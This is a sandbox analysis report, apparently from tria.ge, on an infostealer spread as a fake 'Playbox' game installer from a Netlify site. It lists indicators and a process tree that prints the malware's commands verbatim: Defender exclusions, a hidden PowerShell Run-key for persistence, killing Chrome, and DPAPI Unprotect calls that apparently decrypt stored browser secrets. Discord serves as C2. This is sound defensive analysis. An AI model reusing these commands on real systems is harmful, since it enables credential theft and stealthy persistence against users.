Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Resubmissions
01/07/2024, 15:02
240701-sev2na1fnq 801/07/2024, 14:43
240701-r3zjbaxbld 101/07/2024, 07:26
240701-h91khsyhlc 1Analysis
-
max time kernel
112s -
max time network
111s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
01/07/2024, 15:02
Static task
static1
URLScan task
urlscan1
Behavioral task
behavioral1
Sample
http://playboxgamemix.netlify.app
Resource
win10v2004-20240508-en
General
-
Target
http://playboxgamemix.netlify.app
Malware Config
Signatures
-
Blocklisted process makes network request 2 IoCs
flow pid Process 71 3764 curl.exe 80 692 curl.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 4072 powershell.exe 2604 powershell.exe 4268 powershell.exe 3136 powershell.exe 4236 powershell.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation playbox.exe Key value queried \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation cscript.exe -
Executes dropped EXE 1 IoCs
pid Process 2716 playbox.exe -
Loads dropped DLL 1 IoCs
pid Process 2716 playbox.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Powershell = "\"powershell.exe\" -WindowStyle Hidden -ExecutionPolicy Bypass -File \"C:\\Users\\Admin\\AppData\\Local\\Temp\\xGdKlfJTqLoOnEp.ps1\"" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Steam = "C:\\Users\\Admin\\Downloads\\PlayboxSetup\\playbox.exe" reg.exe -
Hide Artifacts: Hidden Window 1 TTPs 1 IoCs
Windows that would typically be displayed when an application carries out an operation can be hidden.
pid Process 2796 cmd.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
flow ioc 65 discord.com 69 discord.com 97 discord.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 66 api.ipify.org -
An obfuscated cmd.exe command-line is typically used to evade detection. 2 IoCs
pid Process 3896 cmd.exe 5060 cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName taskmgr.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 taskmgr.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString taskmgr.exe -
Detects videocard installed 1 TTPs 11 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 4764 WMIC.exe 4608 WMIC.exe 5060 WMIC.exe 2708 WMIC.exe 1972 WMIC.exe 1156 WMIC.exe 2292 WMIC.exe 3292 WMIC.exe 3804 WMIC.exe 3044 WMIC.exe 1624 WMIC.exe -
Enumerates processes with tasklist 1 TTPs 2 IoCs
pid Process 3492 tasklist.exe 3996 tasklist.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe -
Kills process with taskkill 1 IoCs
pid Process 3136 taskkill.exe -
Modifies data under HKEY_USERS 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133643198079312397" chrome.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings chrome.exe -
Modifies registry key 1 TTPs 2 IoCs
pid Process 4208 reg.exe 1332 reg.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1800 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4988 chrome.exe 4988 chrome.exe 4268 powershell.exe 4268 powershell.exe 4268 powershell.exe 5012 powershell.exe 5012 powershell.exe 5012 powershell.exe 4732 powershell.exe 4732 powershell.exe 4732 powershell.exe 4236 powershell.exe 4236 powershell.exe 4236 powershell.exe 4072 powershell.exe 4072 powershell.exe 4072 powershell.exe 3876 powershell.exe 3876 powershell.exe 3876 powershell.exe 2604 powershell.exe 2604 powershell.exe 2604 powershell.exe 2292 powershell.exe 2292 powershell.exe 2292 powershell.exe 4920 powershell.exe 4920 powershell.exe 4920 powershell.exe 3136 powershell.exe 3136 powershell.exe 3136 powershell.exe 2000 powershell.exe 2000 powershell.exe 2000 powershell.exe 3388 powershell.exe 3388 powershell.exe 3388 powershell.exe 2716 playbox.exe 2716 playbox.exe 2716 playbox.exe 2152 powershell.exe 2152 powershell.exe 2152 powershell.exe 2180 powershell.exe 2180 powershell.exe 2180 powershell.exe 1556 powershell.exe 1556 powershell.exe 1556 powershell.exe 892 taskmgr.exe 892 taskmgr.exe 2604 powershell.exe 2604 powershell.exe 2604 powershell.exe 892 taskmgr.exe 892 taskmgr.exe 892 taskmgr.exe 2028 powershell.exe 2028 powershell.exe 2028 powershell.exe 892 taskmgr.exe 892 taskmgr.exe 892 taskmgr.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 892 taskmgr.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 3 IoCs
pid Process 4988 chrome.exe 4988 chrome.exe 4988 chrome.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeShutdownPrivilege 4988 chrome.exe Token: SeCreatePagefilePrivilege 4988 chrome.exe Token: SeShutdownPrivilege 4988 chrome.exe Token: SeCreatePagefilePrivilege 4988 chrome.exe Token: SeShutdownPrivilege 4988 chrome.exe Token: SeCreatePagefilePrivilege 4988 chrome.exe Token: SeShutdownPrivilege 4988 chrome.exe Token: SeCreatePagefilePrivilege 4988 chrome.exe Token: SeShutdownPrivilege 4988 chrome.exe Token: SeCreatePagefilePrivilege 4988 chrome.exe Token: SeShutdownPrivilege 4988 chrome.exe Token: SeCreatePagefilePrivilege 4988 chrome.exe Token: SeShutdownPrivilege 4988 chrome.exe Token: SeCreatePagefilePrivilege 4988 chrome.exe Token: SeShutdownPrivilege 4988 chrome.exe Token: SeCreatePagefilePrivilege 4988 chrome.exe Token: SeShutdownPrivilege 4988 chrome.exe Token: SeCreatePagefilePrivilege 4988 chrome.exe Token: SeShutdownPrivilege 4988 chrome.exe Token: SeCreatePagefilePrivilege 4988 chrome.exe Token: SeShutdownPrivilege 4988 chrome.exe Token: SeCreatePagefilePrivilege 4988 chrome.exe Token: SeShutdownPrivilege 4988 chrome.exe Token: SeCreatePagefilePrivilege 4988 chrome.exe Token: SeShutdownPrivilege 4988 chrome.exe Token: SeCreatePagefilePrivilege 4988 chrome.exe Token: SeShutdownPrivilege 4988 chrome.exe Token: SeCreatePagefilePrivilege 4988 chrome.exe Token: SeShutdownPrivilege 4988 chrome.exe Token: SeCreatePagefilePrivilege 4988 chrome.exe Token: SeShutdownPrivilege 4988 chrome.exe Token: SeCreatePagefilePrivilege 4988 chrome.exe Token: SeShutdownPrivilege 4988 chrome.exe Token: SeCreatePagefilePrivilege 4988 chrome.exe Token: SeShutdownPrivilege 4988 chrome.exe Token: SeCreatePagefilePrivilege 4988 chrome.exe Token: SeShutdownPrivilege 4988 chrome.exe Token: SeCreatePagefilePrivilege 4988 chrome.exe Token: SeShutdownPrivilege 4988 chrome.exe Token: SeCreatePagefilePrivilege 4988 chrome.exe Token: SeShutdownPrivilege 4988 chrome.exe Token: SeCreatePagefilePrivilege 4988 chrome.exe Token: SeShutdownPrivilege 4988 chrome.exe Token: SeCreatePagefilePrivilege 4988 chrome.exe Token: SeShutdownPrivilege 4988 chrome.exe Token: SeCreatePagefilePrivilege 4988 chrome.exe Token: SeShutdownPrivilege 4988 chrome.exe Token: SeCreatePagefilePrivilege 4988 chrome.exe Token: SeShutdownPrivilege 4988 chrome.exe Token: SeCreatePagefilePrivilege 4988 chrome.exe Token: SeShutdownPrivilege 4988 chrome.exe Token: SeCreatePagefilePrivilege 4988 chrome.exe Token: SeShutdownPrivilege 4988 chrome.exe Token: SeCreatePagefilePrivilege 4988 chrome.exe Token: SeShutdownPrivilege 4988 chrome.exe Token: SeCreatePagefilePrivilege 4988 chrome.exe Token: SeShutdownPrivilege 4988 chrome.exe Token: SeCreatePagefilePrivilege 4988 chrome.exe Token: SeShutdownPrivilege 4988 chrome.exe Token: SeCreatePagefilePrivilege 4988 chrome.exe Token: SeShutdownPrivilege 4988 chrome.exe Token: SeCreatePagefilePrivilege 4988 chrome.exe Token: SeShutdownPrivilege 4988 chrome.exe Token: SeCreatePagefilePrivilege 4988 chrome.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 4988 chrome.exe 4988 chrome.exe 4988 chrome.exe 4988 chrome.exe 4988 chrome.exe 4988 chrome.exe 4988 chrome.exe 4988 chrome.exe 4988 chrome.exe 4988 chrome.exe 4988 chrome.exe 4988 chrome.exe 4988 chrome.exe 4988 chrome.exe 4988 chrome.exe 4988 chrome.exe 4988 chrome.exe 4988 chrome.exe 4988 chrome.exe 4988 chrome.exe 4988 chrome.exe 4988 chrome.exe 4988 chrome.exe 4988 chrome.exe 4988 chrome.exe 4988 chrome.exe 4988 chrome.exe 4988 chrome.exe 4988 chrome.exe 4988 chrome.exe 4988 chrome.exe 4988 chrome.exe 4988 chrome.exe 4988 chrome.exe 4988 chrome.exe 4988 chrome.exe 4988 chrome.exe 4988 chrome.exe 4988 chrome.exe 4988 chrome.exe 4988 chrome.exe 4988 chrome.exe 4988 chrome.exe 4988 chrome.exe 4988 chrome.exe 4988 chrome.exe 5040 7zG.exe 892 taskmgr.exe 892 taskmgr.exe 892 taskmgr.exe 892 taskmgr.exe 892 taskmgr.exe 892 taskmgr.exe 892 taskmgr.exe 892 taskmgr.exe 892 taskmgr.exe 892 taskmgr.exe 892 taskmgr.exe 892 taskmgr.exe 892 taskmgr.exe 892 taskmgr.exe 892 taskmgr.exe 892 taskmgr.exe 892 taskmgr.exe -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 4988 chrome.exe 4988 chrome.exe 4988 chrome.exe 4988 chrome.exe 4988 chrome.exe 4988 chrome.exe 4988 chrome.exe 4988 chrome.exe 4988 chrome.exe 4988 chrome.exe 4988 chrome.exe 4988 chrome.exe 4988 chrome.exe 4988 chrome.exe 4988 chrome.exe 4988 chrome.exe 4988 chrome.exe 4988 chrome.exe 4988 chrome.exe 4988 chrome.exe 4988 chrome.exe 4988 chrome.exe 4988 chrome.exe 4988 chrome.exe 892 taskmgr.exe 892 taskmgr.exe 892 taskmgr.exe 892 taskmgr.exe 892 taskmgr.exe 892 taskmgr.exe 892 taskmgr.exe 892 taskmgr.exe 892 taskmgr.exe 892 taskmgr.exe 892 taskmgr.exe 892 taskmgr.exe 892 taskmgr.exe 892 taskmgr.exe 892 taskmgr.exe 892 taskmgr.exe 892 taskmgr.exe 892 taskmgr.exe 892 taskmgr.exe 892 taskmgr.exe 892 taskmgr.exe 892 taskmgr.exe 892 taskmgr.exe 892 taskmgr.exe 892 taskmgr.exe 892 taskmgr.exe 892 taskmgr.exe 892 taskmgr.exe 892 taskmgr.exe 892 taskmgr.exe 892 taskmgr.exe 892 taskmgr.exe 892 taskmgr.exe 892 taskmgr.exe 892 taskmgr.exe 892 taskmgr.exe 892 taskmgr.exe 892 taskmgr.exe 892 taskmgr.exe 892 taskmgr.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4988 wrote to memory of 2264 4988 chrome.exe 82 PID 4988 wrote to memory of 2264 4988 chrome.exe 82 PID 4988 wrote to memory of 3064 4988 chrome.exe 83 PID 4988 wrote to memory of 3064 4988 chrome.exe 83 PID 4988 wrote to memory of 3064 4988 chrome.exe 83 PID 4988 wrote to memory of 3064 4988 chrome.exe 83 PID 4988 wrote to memory of 3064 4988 chrome.exe 83 PID 4988 wrote to memory of 3064 4988 chrome.exe 83 PID 4988 wrote to memory of 3064 4988 chrome.exe 83 PID 4988 wrote to memory of 3064 4988 chrome.exe 83 PID 4988 wrote to memory of 3064 4988 chrome.exe 83 PID 4988 wrote to memory of 3064 4988 chrome.exe 83 PID 4988 wrote to memory of 3064 4988 chrome.exe 83 PID 4988 wrote to memory of 3064 4988 chrome.exe 83 PID 4988 wrote to memory of 3064 4988 chrome.exe 83 PID 4988 wrote to memory of 3064 4988 chrome.exe 83 PID 4988 wrote to memory of 3064 4988 chrome.exe 83 PID 4988 wrote to memory of 3064 4988 chrome.exe 83 PID 4988 wrote to memory of 3064 4988 chrome.exe 83 PID 4988 wrote to memory of 3064 4988 chrome.exe 83 PID 4988 wrote to memory of 3064 4988 chrome.exe 83 PID 4988 wrote to memory of 3064 4988 chrome.exe 83 PID 4988 wrote to memory of 3064 4988 chrome.exe 83 PID 4988 wrote to memory of 3064 4988 chrome.exe 83 PID 4988 wrote to memory of 3064 4988 chrome.exe 83 PID 4988 wrote to memory of 3064 4988 chrome.exe 83 PID 4988 wrote to memory of 3064 4988 chrome.exe 83 PID 4988 wrote to memory of 3064 4988 chrome.exe 83 PID 4988 wrote to memory of 3064 4988 chrome.exe 83 PID 4988 wrote to memory of 3064 4988 chrome.exe 83 PID 4988 wrote to memory of 3064 4988 chrome.exe 83 PID 4988 wrote to memory of 3064 4988 chrome.exe 83 PID 4988 wrote to memory of 3064 4988 chrome.exe 83 PID 4988 wrote to memory of 4448 4988 chrome.exe 84 PID 4988 wrote to memory of 4448 4988 chrome.exe 84 PID 4988 wrote to memory of 2840 4988 chrome.exe 85 PID 4988 wrote to memory of 2840 4988 chrome.exe 85 PID 4988 wrote to memory of 2840 4988 chrome.exe 85 PID 4988 wrote to memory of 2840 4988 chrome.exe 85 PID 4988 wrote to memory of 2840 4988 chrome.exe 85 PID 4988 wrote to memory of 2840 4988 chrome.exe 85 PID 4988 wrote to memory of 2840 4988 chrome.exe 85 PID 4988 wrote to memory of 2840 4988 chrome.exe 85 PID 4988 wrote to memory of 2840 4988 chrome.exe 85 PID 4988 wrote to memory of 2840 4988 chrome.exe 85 PID 4988 wrote to memory of 2840 4988 chrome.exe 85 PID 4988 wrote to memory of 2840 4988 chrome.exe 85 PID 4988 wrote to memory of 2840 4988 chrome.exe 85 PID 4988 wrote to memory of 2840 4988 chrome.exe 85 PID 4988 wrote to memory of 2840 4988 chrome.exe 85 PID 4988 wrote to memory of 2840 4988 chrome.exe 85 PID 4988 wrote to memory of 2840 4988 chrome.exe 85 PID 4988 wrote to memory of 2840 4988 chrome.exe 85 PID 4988 wrote to memory of 2840 4988 chrome.exe 85 PID 4988 wrote to memory of 2840 4988 chrome.exe 85 PID 4988 wrote to memory of 2840 4988 chrome.exe 85 PID 4988 wrote to memory of 2840 4988 chrome.exe 85 PID 4988 wrote to memory of 2840 4988 chrome.exe 85 PID 4988 wrote to memory of 2840 4988 chrome.exe 85 PID 4988 wrote to memory of 2840 4988 chrome.exe 85 PID 4988 wrote to memory of 2840 4988 chrome.exe 85 PID 4988 wrote to memory of 2840 4988 chrome.exe 85 PID 4988 wrote to memory of 2840 4988 chrome.exe 85 PID 4988 wrote to memory of 2840 4988 chrome.exe 85 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument http://playboxgamemix.netlify.app1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4988 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9747eab58,0x7ff9747eab68,0x7ff9747eab782⤵PID:2264
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=280 --field-trial-handle=1896,i,11069974228332786304,13169078296566857472,131072 /prefetch:22⤵PID:3064
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2164 --field-trial-handle=1896,i,11069974228332786304,13169078296566857472,131072 /prefetch:82⤵PID:4448
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2212 --field-trial-handle=1896,i,11069974228332786304,13169078296566857472,131072 /prefetch:82⤵PID:2840
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2776 --field-trial-handle=1896,i,11069974228332786304,13169078296566857472,131072 /prefetch:12⤵PID:1864
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2800 --field-trial-handle=1896,i,11069974228332786304,13169078296566857472,131072 /prefetch:12⤵PID:3432
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3900 --field-trial-handle=1896,i,11069974228332786304,13169078296566857472,131072 /prefetch:12⤵PID:2436
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4944 --field-trial-handle=1896,i,11069974228332786304,13169078296566857472,131072 /prefetch:82⤵PID:1792
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4440 --field-trial-handle=1896,i,11069974228332786304,13169078296566857472,131072 /prefetch:82⤵PID:432
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4972 --field-trial-handle=1896,i,11069974228332786304,13169078296566857472,131072 /prefetch:82⤵PID:3492
-
-
C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"1⤵PID:904
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:3388
-
C:\Program Files\7-Zip\7zG.exe"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\PlayboxSetup\" -spe -an -ai#7zMap31564:86:7zEvent178511⤵
- Suspicious use of FindShellTrayWindow
PID:5040
-
C:\Users\Admin\Downloads\PlayboxSetup\playbox.exe"C:\Users\Admin\Downloads\PlayboxSetup\playbox.exe"1⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:2716 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "type .\temp.ps1 | powershell.exe -noprofile -"2⤵PID:2988
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" type .\temp.ps1 "3⤵PID:4428
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -noprofile -3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4268 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\oulxpk2c\oulxpk2c.cmdline"4⤵PID:668
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE937.tmp" "c:\Users\Admin\AppData\Local\Temp\oulxpk2c\CSC6CF1C74C3D3C4D7BB74171C975C58C6D.TMP"5⤵PID:4592
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"2⤵PID:2368
-
C:\Windows\system32\curl.execurl http://api.ipify.org/ --ssl-no-revoke3⤵PID:3908
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:4344
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
PID:3492
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "taskkill /IM chrome.exe /F"2⤵PID:1068
-
C:\Windows\system32\taskkill.exetaskkill /IM chrome.exe /F3⤵
- Kills process with taskkill
PID:3136
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:4528
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
PID:3996
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,6,99,59,19,92,149,197,65,145,228,210,141,215,140,131,116,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,155,35,83,190,139,240,78,64,183,181,176,71,154,136,46,8,154,175,198,238,66,163,199,19,96,154,189,19,157,7,98,100,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,121,32,168,152,124,29,126,161,46,102,36,210,172,232,79,133,7,149,72,161,111,219,248,207,78,78,45,212,7,0,196,95,48,0,0,0,254,221,17,226,162,246,210,144,181,174,8,17,112,91,2,188,27,116,7,240,53,165,197,248,206,109,93,19,115,128,29,174,255,134,212,76,70,27,93,216,139,50,1,209,204,193,59,55,64,0,0,0,207,184,225,20,186,104,44,46,202,44,51,151,158,1,215,252,254,82,197,210,118,130,96,79,86,107,109,226,74,57,130,147,113,159,137,248,111,189,48,247,47,64,190,226,117,187,13,62,42,36,201,25,51,96,88,26,62,114,5,242,86,224,211,96), $null, 'CurrentUser')"2⤵
- An obfuscated cmd.exe command-line is typically used to evade detection.
PID:3896 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,6,99,59,19,92,149,197,65,145,228,210,141,215,140,131,116,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,155,35,83,190,139,240,78,64,183,181,176,71,154,136,46,8,154,175,198,238,66,163,199,19,96,154,189,19,157,7,98,100,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,121,32,168,152,124,29,126,161,46,102,36,210,172,232,79,133,7,149,72,161,111,219,248,207,78,78,45,212,7,0,196,95,48,0,0,0,254,221,17,226,162,246,210,144,181,174,8,17,112,91,2,188,27,116,7,240,53,165,197,248,206,109,93,19,115,128,29,174,255,134,212,76,70,27,93,216,139,50,1,209,204,193,59,55,64,0,0,0,207,184,225,20,186,104,44,46,202,44,51,151,158,1,215,252,254,82,197,210,118,130,96,79,86,107,109,226,74,57,130,147,113,159,137,248,111,189,48,247,47,64,190,226,117,187,13,62,42,36,201,25,51,96,88,26,62,114,5,242,86,224,211,96), $null, 'CurrentUser')3⤵
- Suspicious behavior: EnumeratesProcesses
PID:5012
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,6,99,59,19,92,149,197,65,145,228,210,141,215,140,131,116,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,165,162,117,116,222,101,115,200,198,214,189,245,245,145,112,137,100,37,252,99,133,68,167,154,134,73,170,205,22,190,20,2,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,234,179,229,152,186,119,58,6,125,108,83,47,218,192,240,123,221,34,151,0,206,114,233,204,166,38,170,69,208,29,245,222,48,0,0,0,65,234,21,156,203,156,10,193,40,122,154,0,187,175,47,36,219,240,254,153,152,79,157,119,242,202,73,181,189,206,175,113,209,54,169,250,74,132,71,138,234,154,73,207,130,9,239,28,64,0,0,0,184,172,213,9,161,199,246,52,21,22,63,113,174,73,169,114,80,71,218,105,64,88,130,68,70,73,183,78,202,229,196,7,113,251,79,57,191,121,31,85,229,109,39,22,249,15,16,107,166,186,144,81,225,232,117,12,181,132,89,212,154,104,235,116), $null, 'CurrentUser')"2⤵
- An obfuscated cmd.exe command-line is typically used to evade detection.
PID:5060 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Add-Type -AssemblyName System.Security; 